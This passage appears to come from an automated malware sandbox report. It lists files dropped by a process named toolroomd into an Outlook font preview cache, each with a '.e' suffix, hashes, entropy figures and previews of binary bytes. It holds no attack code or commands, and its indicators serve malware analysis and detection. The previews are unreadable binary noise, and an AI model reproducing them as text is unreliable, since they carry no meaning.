SSDEEP:	24:ELEiwYADfHnjHSQd9h5s9gVFJv5jp0Dgkf5S6VLrplc1sePc0m7:EGxfHnjx93JRiDrhPVnplaNpq
MD5:	4FB774DBFFB8315D9C091C94531AF2D9
SHA1:	AE69C8E426AA868C632622D01EA1F154827C6B83
SHA-256:	0D5AA68D0D65E7EB52F27C10132C2A6D3730E97EB2BE991FF8D81FC8213AD0D5
SHA-512:	A3D72992C91B1F412C503D1E805F4FB33EFF8FFF442C61D39876654D8A3DA6057E5EE1C42E671AA27B9AE2EF33187480264E9DD0977E1DEF3DFC5CC8AE749190
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..%.=O..J..};..Q..k.ik..YD.o..<S.G..D6.4...xe~...i.P....Od..fhx4.w..-.#.6}=~..7,...Q.[8.8a%TY....?.....s...g.d....[F~....[MfK+....X............4.J.)B.4Y.7.;...;..5.g.i....#......J.~..[c....,..)...........=<....Dc...p.Hi..%.3....$..dd.V..,...SK....'../nW9w.e....A$jP..X....[./....+........1.i".....52.g..J.I.ydu......T..8QI."..m..........e7.......Y-.H..w.nK6..........s......I.5....L..L...E.f....#..p..t_vX..G....&C..h........}....%.eK"..}.........&]7K....?......!.L..S...e..H..lh1..@....n..)..a.....%.w...E.).{D.'MR2C.^(.Rm.......W......'..X...JX.f..Br..S.8=;#\.....P..Io...I...D...SI.....w.....jdYh..P...#J,<G<t.x.V....T.95.u.....ny.=.5..\|).....}.a...X.'E7q&T$..#B.np8.+x..&R...4..A....\NA....0........./........iP\|.;.1.&zDA,.).'..I..U..0...{v.Hv.[\.u....u...'a#E\|..Z....N'.E.L.v1..hG......7..E.8G....e.d&.8.....x......Wy.."C..7u...e.>.]..U..r....0.....E.a>.....Z....\.{P:.).)${.J...J..:*,.\.....NGK{..\.&...G..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Gill SansRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	7.399746741569973
Encrypted:	false
SSDEEP:	24:EZxVnfmsCjFxs1ToqcNioMpo6jWieYH0Q51dnK25V2rtYsePc0m7:ERmskXs1sqsPKo6/e2351dnKEYiNpq
MD5:	6A6678EBDC1B1EB1DDA251742299B8DA
SHA1:	4830D3A04F3EBBA09EF0F8317D73C59235C0CE93
SHA-256:	E9B29CB05140436B6674120860AADA0419DB5B2FCBA9E0C2728AEFD3EC6C3447
SHA-512:	74C6777FB15E9D8929E05169208415AD84919EBFACE4B41F8E690ED715132C1C7C252EFE15760778A7627C9050441036FCF90BD9D80ECA48866E83D6A7E9CE5F
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a2..Gj.wm.i.\|.s..x;m....].%...D....a..;....S.c...l..Sf....q....9..m\|...4F..O..L........Y...#._n%i.[...x..,.&.K..r.d.T\|z..t.5j.u/....y...MN...:D(.U......~0.......?dX{XA...A....)Q....'A"P.....gR./F.V.J'..}7.Dp.K...ad.t..$..K4..^...N.S.P..S..T.Z.."..v\|...#.oa.f...%...$....RM....Q=..kM...W.>o.!.4...,-..e.,vjy.K8...?.jP.Q.=Bx..=XvD...g.0d..U.L.V.7.......~..=...C.N1...Px..g...P.:h...O...v.b.....S."............WpP.D,....p..}$L..1...;.P..mQ.A.a.I.k......!$:T..t9...).8^.=..V@'Y.==.9..y.LI....L.f.Ip~T..\|.\....R`g`.z.)...S.qN.;eI..w=n.:!......~)...3#V.Q0K..-G.H... "......:.&...b.E...$F.Z..s......t:........?{l0....O.>........F...5.XMb.....By..#.6.!..^.<.Jr}&$..(..x..xX.Z.O....+....S2.e:T......'.:%...Fl.2.(U......,...(..n.k.5s9.X3....._...&r.u,...A.......$...v.u..b..`.1.........dZt.........aT.G.&..f..\|...L..{e.w.v.c.R....Q.].W."....g9..+......Vf....)...Hz.qN...Z.k.<.P....%.&W..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Gujarati MTRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1410
Entropy (8bit):	7.4877965798590695
Encrypted:	false
SSDEEP:	24:Yu0psY0at1kFqPQDGiujS0+FpJHwWhMGXVTnjNsLD7c5uZhIRsePc0m7:YuGsyt4tCiY9IpJeGXVTjN4DBuNpq
MD5:	C6F217A94C8413E6EE64D94D7C573DFE
SHA1:	64DFD892A560E580FA7196A7579923F37913034B
SHA-256:	5AB70F8B3859A4409C3A250FCDBE360A6471B64CBB464EF5531D8B620B6CA283
SHA-512:	0FCDD45829AF0E6A6D936B4A881C364F19A65976005137613A90109BC9AA0273E2C48F3767A2E52BA1BD694C6E6B48D40AC850B85DF49ABEF63F79712F39135F
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.aF..."1...6.."..r#.A.K..=v....LXc.0d.0..o<..y..&m@?.....I.<A7}...1Doe............s.v.......%.E........^6..S...lR.l.e._..6.........b.m. .Pb.....nf!T.5J....4#..sG..Q.....`].ra...w.f.A.s]..H.K7....MV[,........Ml.o.U.U.......Y.A.8..d...V4a..iJ.yq....f.T%i.V.j..c...O<I.#7...&..Rv....g5..&.L..=.....s...y.9..Q....f...^U....fS.,/...u.[_.....-....`..ks.^...-<..m.....C.u.&.C4,...f...e4.......#d......U '8.....^..v../.;..Z.....;.P.:.1........d.OEF...b.47......g&m...t..z..h..:...WK~/..Le....7.1....?yl."1.:U..p..-.i.L.T...e(.LXR.d..JI..N.G^/..H....$e......Dh............-..{O...W........0..x.....6........S&}.z...v....5...03%m...b.5.A.>..@g.!...i.Q.K.?.'Yg...A..S.+........\).D..)~9..........e.....8Pc...Df.j..OCH......6,I..2.M.m.....{+..,..a'..=.%....ST.,.....a..K.v....Q.....nl.%......I.H....?..Gm>.Ei..J*GM.;u.AS..I`.5....F...S....[Na"93.=B.W.<P....K..6..$. .`.c...I.n..8....n{.....M.....P3.DW.E5n

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Gujarati Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2034
Entropy (8bit):	7.64452391225181
Encrypted:	false
SSDEEP:	24:VaHCGR/KHuHd74BsOQyJVql/7wRVodXSnUKaz5KzYgmqQrk0mwMtQhNUVsjLVDs5:sHFKO9MBs7ic7odnUKI5ZNIdw6VorNpq
MD5:	B0BCC38E4995E557A8771839D15B2704
SHA1:	70BA97E8588DCDC4477DEAA58722B681481616DE
SHA-256:	0F7E33A136113873C39B3EDCDA6C674345750660F112F822E12F1E360B834F4A
SHA-512:	97453C53FA170D3F38FC451F43AE6B3D41C4F47A3392D30850D141221C23282DDA8E6288D3BCBC2493CCB6E1426ABE68636629DCB4D3D6A23419A00BC34A1413
Malicious:	false
Preview:	.<.\|.....f.A..1...N#. ..\.L.@..4-F+`..i .Y.a.............H.$3m.>...h.{i%.2....m&x/...2.43..5.t.x....`.v...~....r.@a.V...VWOhZ..qI_.c.V.I.(d....I.(d....I.(d....I.(d....,.c..!E.Xx..`n...>..m...K'.v/...x.(.....S.).....0...~M=..f}3u.;'.v.J.3?A..?....?^V.....@..W.j\|B.C..y..u...a.R...7......gT..H.........!.0..Y%\.;.?%h..X..el./..........V..\.,@_.iG....S..OTm.S#.....j...^.<..??..9g..A..%....=.l....... ..N..X..b!...-......q...~.j(...d...J....S0....].}4.f%.N.......[..K.1...d'.......:T.2....r...O_..J...q.6a.......J..w....3..LP-..'..[k..<.T..E%X\|..Q[2.Q..q.;z.2>...2 ~..,i2p.rk....j/..4X.f.d>..3?.B.y...\|.&...c.....{\|..O..`...m..#LB.C..._.Sm0...H...8.......u...p..Q..(...n....T.t....F0Bdg..5.K=d...k.._....S...p;..lU.K...K..)$....Ss..a!?v.zFx.a.........)`-..S.U.!.........N].,8..(%.f..#1%[..t.`..Jr6ss.....%....Y.\|4....V..t..O..!.....n.0..ZE.7.h...]..._.@.cP.....Z...1...A..<..T.f}Wa...FG.9.Dy.....y....Z..T>8Rr..."..t.......p.3H.J..E....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Gurmukhi MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1322
Entropy (8bit):	7.422926316736434
Encrypted:	false
SSDEEP:	24:EIhNtKV5FYWqfrSO5M1ToTUxeONbpcOuK6+ceX3pJ/E7aHBsePc0m7:EIZiYlzS4Mp4oLLcDKsE/E7aHBNpq
MD5:	A1621E5437E1D97B06C4EC820471491B
SHA1:	B5D231EFD390AE13D3B0AEDDD0C07DA17B19F20A
SHA-256:	C85EE4B964E61968AC1DC838BF87B72D4643E3C2FB931BF82EB977495C0CE889
SHA-512:	8C7E9887D18730D10D7A09732BDA59EA525013601CD1F4D161948483C6C01EDF2CACFA4989477E96785319CEE5F6F7116C8E9F724D763444A4714E4298481BFD
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.am...m...v2V..u..8o..!...e..2..@]..e4..d.i....f.d..7..Os.h..o..........Pgs2.E.g....(...........[Ow.kMW.2".s......Yj...._.@...`...3.QP.t...3=u....s..N..6...!.....1...%.y\.K.k.IA.B.....wek.u.%.S.K...^.-....+>.n...9N.8.6S%f.M. .o.'5..6+..a.r...\|......a..\|>..?!M..g..E.....j\..~.t.p...; Q.=.K..6...T)&.g .....'.v.3.....]Y. I.}..........v.Jsv.........7.J.]^{f...R'XT...+..DV_.1.`j.!~......R-j.-.........$B..X.........\|{...Ir..jk._...m.z..u.H...........{.......k...DJ.(..PKS..X..:..S.....0.T..F.^]l.v.-.....t4AQ..vH.q./..m..E..8.T..A#...CE..G..C..\.n..........B^~.Ki......#..!........9..9n..IMx=.4y.uW.2^..c..I.......W.CC..RC.c4V.56...Wx`.(.t.h....m.j....{...k...,.~A..c..........>....p&b3%.z..P.+c...l>h.D..c..Za.F.@ig.q..W.NE....y[Z4.y..Zn..cC..3...3..w*.....Z`......iE....f....9..cJ.6v....L.m%V\.........7.n.E..f.o.....(...X.....H.#.....ax.\.:~.....J+...W{..!8..74#4.!...g...B..S.?X^g...t..]..&

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Gurmukhi MTRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	7.478629000971935
Encrypted:	false
SSDEEP:	24:Eqsrdv4opnM1CQsFsv74ImW+gG6JZo2CmilEM5s9NlAJbWg1N5zxGsePc0m7:EdJ2CxFsvhFwWZBzNlAJbHGNpq
MD5:	650A383654AAE028228EE9E67D65DCF9
SHA1:	2C1741B2B44C9962AEDC1CF43A5E8925A2FB164B
SHA-256:	AA0ED056009CBDD04BAF69055615A4EC32171606B702606D63269B9466FC5760
SHA-512:	A6DF8A7394CF44B01A923E91E3B1BBE0C3A9A4A50237029FFB39F62FAC4775DE0C3A02E85C4130748508AC4EAAF07AA03457BE7AEB9131C00A0C1CFBF7996DBE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...}..fY..6.."%.hg.KF..A......+..?. .D..(.7G}E...Q...i..'i.A..#..&5q.$l3..T...3N.rs....\|zn....,[.....%.E........^...9.en5.%.V9...u...S....5..J.'t...Z#.'.....$..[..y}....M9k...o....!V...'{.h...2.....z5.E../.....ia.cs..g....z...`@.>.]n_.. .'8..i...e..Isy...(...B".\|s s8p.d........C.[2..v.....z.v...1....l0...Z.D....PD..].....lLv..5..g..i.Q......7.T.4....@1.8.f.$.u.5....tra..:.....\|S.j:.<H...jVF...X.\:..SK.$....@_C...l=....ng.L..nx:......L@.. H.w.).f.1.~..U.d...#..J.....V...}.I."`..........WS\q8.VA..$..L...Z.....nb.Wl..Z.9..a.zI.B..O+..vB........I15..i....O&.......k."..=.-0....+6..Z...j...M.bNmF..e../..g.Q ..@j...W.[..g. ...]V.....G..Ik..k....N.OMG...b1.. .)..'l..O....o.B.".&}..9...--.C..V..7......".(d...)u.,I..b.."FLGy...[@v-._..>....)u.(U...=."g.....5.....jk.<H.q..4=.A..-......1...<Y..R........%....d..E.N...Vn.$..S..{.Tma3..y3..y...u....m..-PT...y..~...7.\|........[..QqK..^./(..j.....K.:..0R..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Gurmukhi Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2066
Entropy (8bit):	7.669692698882169
Encrypted:	false
SSDEEP:	48:Ec9ORKM62S+2IDkw/ak5LSKIEcGxt3I0Npq:L9/VVIDk6NL6BGL3Zu
MD5:	8F10B0CD4FC4BAFEF1E0C60FD1E2060F
SHA1:	14A90B02E77F867734B83278EA8CD521B9A6420E
SHA-256:	C1278067CD226EBF5C4303CF7840D05F5FD9F95F1D4DA1A4000BD5E15D42D8EF
SHA-512:	0AF7A1A98BD64FD302CF8E3D033B339669C68DEEE6E0EA8F86C7B90261293DEA83F3400B4113D6EF05C806F3C7FB761695FC39A60E992A0F8F629E08DCE8C02B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...D7...+tWJ..V.l...d,0.jm..K...`.....f..b9Zh...Y....9..BO<..3?.GbZ.!....j..f ...w_.s......a.... .b.RX.^'PS.RX.^'PS.RX.^'PS...uC.ZAH.K.:...]'U..~bM../SX.M.._dw..1)....E%]_.\|.."............j}...^<.8....KSz......`....9...+.C.qs..c$q.H.....Dem[3m....V..i:O.?..x./..A.j.2.K......Q.%.%..d...... .gm0p]../z.......Y.9H.25p.1..=.6nG.D....I../...3>_..i...k.....r..8.R.']...Y.........sTo...B.G<.......#......?.a~"..]...(e....f5..........$.A...Y..B.....;..7.^p...%.R.2.H...\|+1.'..R=7....Tv..[I...........u.+....I....hPA...R..G..<.2..A#...F..\..Z.]j;.qJ.,.....K1..6...k.>(..4.C..s.Ji.::...........U...A..v ...~...O..<..../.Ie. .4......vJ./i.7.....Qn. .......6.U\.v..1..\..P..3..=....t.fK...n.9.Bn.p3.,...Q..?/?x....^b..% .o........b7P.7^..J.T.\|.LZ4....xX.~..E.........}Po.G..vH..,.92...........>,.s9v..{..I..(.6..x..g..`*t...S_...!5.......b.Q..n.3!\|t...d..D.i~#;...0.~...(9.>...d...y"...!..h.0..4.e%s..v,....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Heiti SCMedium.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1218
Entropy (8bit):	7.3447271939112415
Encrypted:	false
SSDEEP:	24:EpN9k9BpEeiHG0RcyqBKi/3Z04w3or83WJMTvsePc0m7:Eq9BGHjRCBz/3OR3Q83sMTvNpq
MD5:	CB226D92148B4AB38591B5188275D0FC
SHA1:	087843980AF90ADF45DCD9A9CC2C53BC021FEE29
SHA-256:	010CD3DCEDB71A25D2AAB7D10561B180D2B514473E91E9BC944EA9B469C1F750
SHA-512:	ADD0C9D10CA5E192E4380BF229CD1002B19F8B55B6C62D4280D4D341C70A58730543024188EBD7CEDDC0566FD655E430E9068EB2BCB648EC70ABCE9917D0D5AE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a?../.......z.\.\..w#..=..w...5.._.1.A..)'.c.{,..~<..A,...6+.RF..f...'.A......%..2b3....d.(....w..<.+...Apc..7-l.nT.Z....N>..._.f.j.r.E..L..l..A.r.a.....rb..c...%H4.Dl.2....kM5..YR.<J.\|.PJ.A...e.<..5el....WV..s.H`a..$........5Uk.....O<.}.....z..=..D,...$..?...{^..^...@.X.^...=....?%..........:..B......bE...m.hf.....E .'1......Z....Ve..n.)..........t.T@.v.R...t&...F...Ig.5..<..9.\|...!........5z-......ID.....p #;W.(.BIf..... ..&..@.....vA....W......>.D..h~...^....Q~..H.y..UKg.2....i..F... .p.?..t..T..-~F.q..R.J[..qK...?....Q-B....I.Ge..O.Ae.\Y.W.s....X.t.f.uvJ./...#.H^\|.=....e >.....;.91..3..7.<;...=n.A..k.KTwP...'ZX.M...7.....^,.'y.z.;.O#_.R..D..#.V..g...1.).`..vH.Pd....B'...>l. ...gy."...5......d.f3...;..&.\|.F0.-....<...0..#=.6..S...Q@....gQ.P..F.,..a.Aq.H%0A.G.6 ....Rp.u>/.h.`;"..."....\|........U..u)y...>RU...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Heiti TCMedium.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1138
Entropy (8bit):	7.289680940056414
Encrypted:	false
SSDEEP:	12:WvyOjwy+wyKpDW9ut1AMEK/jfrVzLqxZZ75H3WOSRDXae4WZeY7ssO01URt5cEPB:EMFkW9uScFqV3WxDQ7ub1mGsePc0m7
MD5:	9769F52349D02BD1EE741C4E10E3FFE5
SHA1:	E88CD7D9EEBD3A35E168A71B9CCBF4FDB65563A8
SHA-256:	24D0A0436D88BCF6BF387862D3A85B6E4FEC8094D5EDC1553F3B6A6AE87237F1
SHA-512:	03CD4DE681F082CDD002DC7D79AA02F92F3BB5F94AF26B524B8491FF8409252B32951C8B71CAB8717B9FEBB29D110F4113ADEE5E07E350F151C77A82AA183840
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aRc}...J...c.EN......bPl;\|...7=.%M.e.',s...@..:.l......L..l..2..g...['B......'N...6q...e.e..W.[y#.M.z.....7.....F..Q..9..[.......4..q..A.cI....Z..q..!......Y..[...+........X..s....K3.nl..}.#..1...,.........(.@...W...'.q......+O..._..G^....KD.....@.$..te..s..Q..}..M.o.......TI<....~)f..k.....W.J...y.b.S.u...q...r.3..JW..U"?.c..g..p......,......\o..v...l3vO..j....EE .(.4<l.c........k6....:.%..}.2..So#.=T.l.>..}.;z5d..y.O........\.8t.&."...(/..H...g..>....h.B.S."..Q..VJ5#E.R$..-.o../..."..CH.../...#&H5.h.;.g.j!.0I...Je...:.@...X3..n.<.'_=..k..4.z..C;.Ny...@........R.Z.5...,..8G..(...0...}9....n.K......>.z......eQ....} Q)...F.`........9&#x...).....13]..E.T....x..N6..H.H..+..O....L6.J+....m..7-l.nT.izBPWy......+W.J..E.d.......Z7.E\.:#=.6..S..A.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Helvetica NeueRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1522
Entropy (8bit):	7.491264449547965
Encrypted:	false
SSDEEP:	24:E0v5x9AkFnOqnBNZ1gfI3YjZ0KIkFQ6uwbEkudLLqFQi61O4nxVb3ri9ThsePc0q:E0vxOkvZ1EKMZ03kFQRwokudL9ikOqXJ
MD5:	1211681BE8FBB2B1FECE78D9621D5ECD
SHA1:	A01777B3B620724B605BF47CCA49738B23E46097
SHA-256:	665B6FC4E55C3EA44229756F53A4D878B658331C48F24CCF8FE1E89D6EF8D50E
SHA-512:	DB8CF5D042CDAD184896D06ADEA4DDC92CBEBD737F230C5CD9CF6780863581D4F97AC20C40F0A1D73DD74FBE620072AB0E4A410BC88F8DCDFAFA51EF0C920CE3
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....C...k[..y$.5 A%......).j.M....W"..@m......VB.P3.....>?0...).P..........mmr+...._.^..s7...;.I..n0..M...I.u...Z.X.7....#...R'R..j.E.z~St..A.sqB.q4.EA.e..rU....u..]A.&V....f..1u..r@.(S1.q....P$k.....Y.W.t..xc.=..~...}.pC....@.....:B>q..Gi.a....X.&#l.......Z.(.` q..Sf.K3..H.C.].l9x.g.4:.'..T...Qk......d.,.....5.a...X...R..M..9.Y...$......>9.H...vC.....=..g.........}om...D..0.$..p8Q..ah......$....#O..e.3Y}...1IX.).....M.q...g;fTCHb.......d..yw}.1k.d.....,.a.....A/.E.).$....1..`..\|.^Z{......v.....H.mA.q./]...dI."..8.J0..c....]9R...}.Vc.{....D..<...A.h.....\|....g.H..?..]..i;..P..3...].Gfv_7......y.P...:.hf...$..+......h...#....DY.Q._../>I.Q...Il.@...h.......h.zS3$.'"..J.F.....5.z..ZH...Dg.f........C.=.Q.3iJ.j..3.VS......Z...U.~om\M.5....O..........*....%.EO".i....A:CP.'..f.=.5..j0_.....k..........?....r.....v.r-=..U".%.......79.&..T...['...+r.(;......w...;.~...E.Q.E...........m...<.V.%.'..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.HelveticaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1234
Entropy (8bit):	7.3785878890193
Encrypted:	false
SSDEEP:	24:EjW5M9X8NRyASHBnpqtIncCBrgP9FoV22MOptDigPqxywRqDsePc0m7:EjWMRXp2AcW0LoXtfqzRqDNpq
MD5:	156B87651780B575C9EC1CD47499B8A8
SHA1:	B8E492CD2D3EBC6C3F0F35C68A3B7974C5F34A14
SHA-256:	EF948DB2D270C0671DC7426374F61F5FED79CFA72F30519F734E0802ED3BE0C6
SHA-512:	B617F218CBB858B0488C82E70955B0FE1A7BFD7CDF79F36F1235B9ED34646107213082FAB0C181965F21EDD229AB1E2CF6B1E4C0CFE8D458FCC12E14A529F717
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....q.....P&.~..].....(......n....>`w..4..\...or...f>.xz.q!'WM$8....X.....O...v.....{C..@.4.l......F..d'.rr.G...y...L.....PpA.j...5q.u.X.v.P.g..BZ...6A"3..(......=><...L:....,l.B..u..P.S.c&Yk....$...Y..e..).X.:..=.}.:...d.wGC..q..........S...8x?...3...>.b....Vf.S..R...........4#..`qe.......y.uD......n...~....i.....o.j-...r7.'.2.q.@.....e..{.z......S~Wu.^..G.(3+K.............%...=.X[.R\|........-ds.\(m+.w.....P.t..;........oI..z.?.@.......~...o..;.(.......`..^....l)....X...6......p!!.."q.C>A..O....J_)T.@1{81;..R.%w..v.[.._....#..K0......vv;..s@..K......(.......:F.\|.o\|.gN.q\.V..._i..g...t.Qm.a...39.Y&.d.4zz.....I....}.H-..~..?$.eg..3..\..J.......E..[......'.\|.O...:......$.!]......f-..8....<.....U...-.~.0.<..c>..)1.CKos.z......].^5.r.;.`q..(..%.....Z.....PD;7.V5..y.E....M.q..H........Ia..8.{..u>/.h.`H..3..t"......3..Kk"F_.&5`[.n.....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.HerculanumRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1874
Entropy (8bit):	7.613584155492819
Encrypted:	false
SSDEEP:	48:E27gE6L6LyuN4/LWm2gtAXa4aZOnw5yh+FlERfZPGtLjNpq:5gEizDWwd4SN5yAFlEdo9u
MD5:	0538AFCB52274C1D0C41CF8082ECF849
SHA1:	637112177140D928B97033E9EE48CB9730505D1B
SHA-256:	0F32582948F0AF25A0F5F71A02A57154C4C1EA4110B8100A183A924C0781467D
SHA-512:	A85DBD1FB70486A686DFD216A1A8FF63E2C8C668783AF95BE9ED732CA820600EC44F26731B89CF43720704A4F108B70B1EC8A128B119383E271EB8E6FB43551A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.."`..3v...n\.SyNII-6....-...T4.>B...`kY.....gP...zt]O......>0)E1svc>.T..Gx..9\|.....o=.t.1\|W%L.1G#.@ch._...Y....q...0...q...0...q...0..[.5 .s......GK......-CYN..>I.O..4E.....x.Z'..M...@TB>)..........F.^.rNN.$#..5.......R..q~!.3.C.R....$.#..._,Y.}{b...F.JJ^w..q..4$H....j...{.v>..Q.\|....Y.-......=..5U...q.r.]...j.......U\|.!xq@.r...X..D...Mn.6....Z.4jz7.....7.....Msm....J....oH...l.#l..mO.......%D..b.N.j.l.....G....Brp.;G.7%d.,S.(..J\....#ET....;{..j....iSs........~. MNm...Kb.G.O.Q..9..Y...B.D....UEc...:`..Z..l..S..D.v'.j..=....f.K..(..~S..].(\_...!X...G....i...-a.Wa!..q.W ..uK.?..BJ...P..b..%8...F.d...s....=......./X...!-...!.P.,..[gR.J!.A...E.K..L.h.CLP..\|V.6.. ...d..i.@(B....+"#..G..u.....#..E..C.VDFd.}...\.Y<e8:.o..............=..l.I.....#.<SUZ......])..+d.....GB2])....Cp..m.$.U...B@..M\|...,.E..z2.......U..:.2,.:.....L...'...s....;.....?".{...z..z'....z...^....Iy.0..G/X..y.&..k;.r..>kF..t.....Y.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Kaku Gothic ProNW3.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2426
Entropy (8bit):	7.711734099669613
Encrypted:	false
SSDEEP:	48:ET73NhE+fYFYV3hOT+a3JUke1A3GlZ71VsJKUb3h9Hp2J1QmJNNpq:S3NG+fLhOTRJwCowkUbLp2PQ4Nu
MD5:	36F2BDED93E4984279D653191D6A9CCD
SHA1:	B21E6DBE01C462BCF1CB550548770257A289C7F9
SHA-256:	44BE94E15493C7DA6FADE5AA5B5B7E12624E521A72E249083AD69039AB3F11BF
SHA-512:	7580C5F24B79A36F243501B444B8FA795B0AB06183F9D051727B2FB20596D2F62C91636A5A60534153291C0D292E30FE24D6863415CA32E3E0450F6D3C9F868C
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a%.'ief9y:........5...D^....,...E..n_..,.>G..6E=1..[..q.pd..@....dyU\.IFS>..D....g.jI....O......&q..V.Ecu w...%.s...w..x..N..g.m._$y\|..1..J..q........T../?.pdG.R. WR=........C.d...1_%l.Q..ZVf!/...A.{Q....,..f._...77O.Ds(... ._/..Q...`.p.O...0.[......(..Loc.{+.....0g7.G.....5.~..e#.E.1....o....q..7.......Z...s..........4...k]TA..%w ..l.=.Z...?..j;,.kA'v}S(:c_..........Lt...f.9..Z.?E..\|2M....F..MG..!...f..D.D...Fj....;.{....O.u..\|...'w'k$..~...Cm%..1m.......`...B._._.n..m.......v&L..\.n*FD...M.).(...8xLJ..)Zk..X.i.8q.Z32..1.?.=...9X...{\..].(xV$..A.T}.PR.(o.+.."..}D.'.a.F.m.....[..1.].j....`Q8..E...t..g`q.M$.......W.1...rH..p...'=..@.B.......N.,.Hp./..t..7@>.w..1...h.,..` ...Z...d.RBXh....A...p...R.."-T._C...p.h".b.../.Gc.eX..H..m)S.tJT....s#.5......>~.]..~....F.n.....R/.......J.l~VJz.p..D...n'6.(R.^...(...bT.~DL......@i[JI..OL.&... ......")=....^....H..T;w..^l..$......!.......

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Hiragino Kaku Gothic ProW3.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2298
Entropy (8bit):	7.7110593286671865
Encrypted:	false
SSDEEP:	48:Es7et+LmVu6PKhp1oVGVm3dUe9cFNFr+ifrOSXi6Dv1g6qNpq:17Q+yuqkQG03dUe9cNTDsmvi6qu
MD5:	C8B324683A30A935F4DDABC4CF0A39AB
SHA1:	045F980A1E6961D5AD861D09020EE8BECF9339A7
SHA-256:	5E5AE2D0319A818B2B74D0D24232963170D9F3E08FCB8D1E4EFD257D88E21C47
SHA-512:	2C78B7353BC0E40A3DC70945B71A33F7E9527F2BE7590234F2C44AF3CD332EC3DEACDC79123DA4672937DD30344FECDCAC077F91D60EC66D26E0A98902F7622F
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a^.....>8.Ja.....M....Q..N......3g`...eE........M8..d..S#...t..n..P.A.)...iu.c.Y..5..k.....o>....z..:.++.V[.7.k..m 